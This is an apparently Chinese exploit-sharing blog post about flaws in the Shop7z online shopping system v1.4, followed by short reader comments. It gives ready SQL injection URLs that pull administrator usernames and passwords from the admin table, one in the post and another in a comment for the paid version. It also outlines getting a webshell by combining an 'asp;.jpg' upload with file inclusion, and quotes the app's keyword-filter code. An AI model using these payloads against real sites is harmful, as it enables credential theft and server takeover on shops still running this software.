Shop7z网上购物系统 v1.4 漏洞

Author:roker 文件dataname.asp [php] path_back=LCase(request.servervariables("QUERY_STRING")) if instr(path_back,"insert")<>0 or instr(path_back,"update")<>0 or instr(path_back,"delete")<>0 or instr(path_back,"(")<>0 or instr(path_back,"'")<>0 or instr(path_back," or ")<>0 or instr(path_back,"replace")<>0 or instr(path_back,"eval")<>0 then response.write "

你的网址不合法"[/php] 奇葩了。。不知他这么写和没过滤有什么区别。。 于是 看了下数据文件表的结构。。 exp:[php] show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,s_pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20admin[/php] 接下来 getshell 有两个上传的地方 一个是 ewebitor 一个是他自己写的 ewebitor只能上传jpg等正常文件,其他可以利用的都删了 看他自己写的上传。。 可以上传 2013xx.asp;.jpg格式的 可是[php] set MyFile = server.CreateObject("Scripting.FileSystemObject") set MyText = MyFile.OpenTextFile(Server.mappath(filename)) '读取文本文件 sTextAll = lcase(MyText.ReadAll()) MyText.close set MyFile = nothing sStr=".getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|eval|雷驰新闻发布|script|" sStr=sStr&".saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language=" snum = split(sStr,"|") for i=0 to ubound(snum) if instr(sTextAll,snum(i)) then set filedel = server.CreateObject("Scripting.FileSystemObject") filedel.deletefile Server.mappath(filename) set filedel = nothing Response.Write("") Response.End() end if next[/php] 各种过滤有木有啊 可是他忘记了文件包含! 所以 两个上传 结合在一起 就可以getshell啦~~~

3 条评论

  1. Roker

    附上收费版的exp:show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,13,14,15,16,s_pwd,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20from%20Shop7z_Admin
    站长给个QQ求交流呀~~么么哒

    1. X谁谁怀孕
      @Roker

      没几个站用1.4的

      1. 0day5
        @X谁谁怀孕

        诺~本着研究的精神给转载了。

发表评论